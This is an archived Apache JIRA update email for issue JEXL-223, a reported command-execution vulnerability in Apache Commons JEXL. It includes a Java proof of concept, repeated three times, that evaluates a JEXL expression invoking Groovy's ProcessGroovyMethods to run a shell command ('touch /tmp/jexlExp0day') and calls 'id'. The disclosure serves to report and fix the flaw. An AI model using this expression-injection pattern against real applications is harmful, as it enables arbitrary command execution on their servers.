You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@commons.apache.org by "Bruno P. Kinoshita (JIRA)" <ji...@apache.org> on 2017/04/21 07:38:04 UTC

[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity

     [ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Bruno P. Kinoshita updated JEXL-223:
------------------------------------
    Description: 
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.

0x02 POC
{code}
import java.io.IOException;
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

public class elExp {
	public static void main(String args[]) throws IOException {
		// Create or retrieve an engine
	    JexlEngine jexl = new JexlBuilder().create();
	    // Create an expression
	    //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
	    ProcessGroovyMethods n = new ProcessGroovyMethods();
	    System.out.println(n.execute("id").toString());
	    String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
	    JexlExpression e = jexl.createExpression( jexlExp );
	    try {
	    	
			Process process = new ProcessBuilder("id").start();
		} catch (IOException e1) {
			// TODO Auto-generated catch block
			e1.printStackTrace();
		}
	    // Create a context and add data
	    JexlContext jc = new MapContext();
	    jc.set("foo", jexlExp );
	    
	    // Now evaluate the expression, getting the result
	    Object o = e.evaluate(jc);	
	    System.out.println(o);
	    }
}
{code}


  was:
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.

0x02 POC
import java.io.IOException;
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

public class elExp {
	public static void main(String args[]) throws IOException {
		// Create or retrieve an engine
	    JexlEngine jexl = new JexlBuilder().create();
	    // Create an expression
	    //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
	    ProcessGroovyMethods n = new ProcessGroovyMethods();
	    System.out.println(n.execute("id").toString());
	    String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
	    JexlExpression e = jexl.createExpression( jexlExp );
	    try {
	    	
			Process process = new ProcessBuilder("id").start();
		} catch (IOException e1) {
			// TODO Auto-generated catch block
			e1.printStackTrace();
		}
	    // Create a context and add data
	    JexlContext jc = new MapContext();
	    jc.set("foo", jexlExp );
	    
	    // Now evaluate the expression, getting the result
	    Object o = e.evaluate(jc);	
	    System.out.println(o);
	    }
}



> Apache Commons JEXL Expression Execute Command Vulnerabilitity
> --------------------------------------------------------------
>
>                 Key: JEXL-223
>                 URL: https://issues.apache.org/jira/browse/JEXL-223
>             Project: Commons JEXL
>          Issue Type: Bug
>            Reporter: cnbird
>            Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> public class elExp {
> 	public static void main(String args[]) throws IOException {
> 		// Create or retrieve an engine
> 	    JexlEngine jexl = new JexlBuilder().create();
> 	    // Create an expression
> 	    //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
> 	    ProcessGroovyMethods n = new ProcessGroovyMethods();
> 	    System.out.println(n.execute("id").toString());
> 	    String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
> 	    JexlExpression e = jexl.createExpression( jexlExp );
> 	    try {
> 	    	
> 			Process process = new ProcessBuilder("id").start();
> 		} catch (IOException e1) {
> 			// TODO Auto-generated catch block
> 			e1.printStackTrace();
> 		}
> 	    // Create a context and add data
> 	    JexlContext jc = new MapContext();
> 	    jc.set("foo", jexlExp );
> 	    
> 	    // Now evaluate the expression, getting the result
> 	    Object o = e.evaluate(jc);	
> 	    System.out.println(o);
> 	    }
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)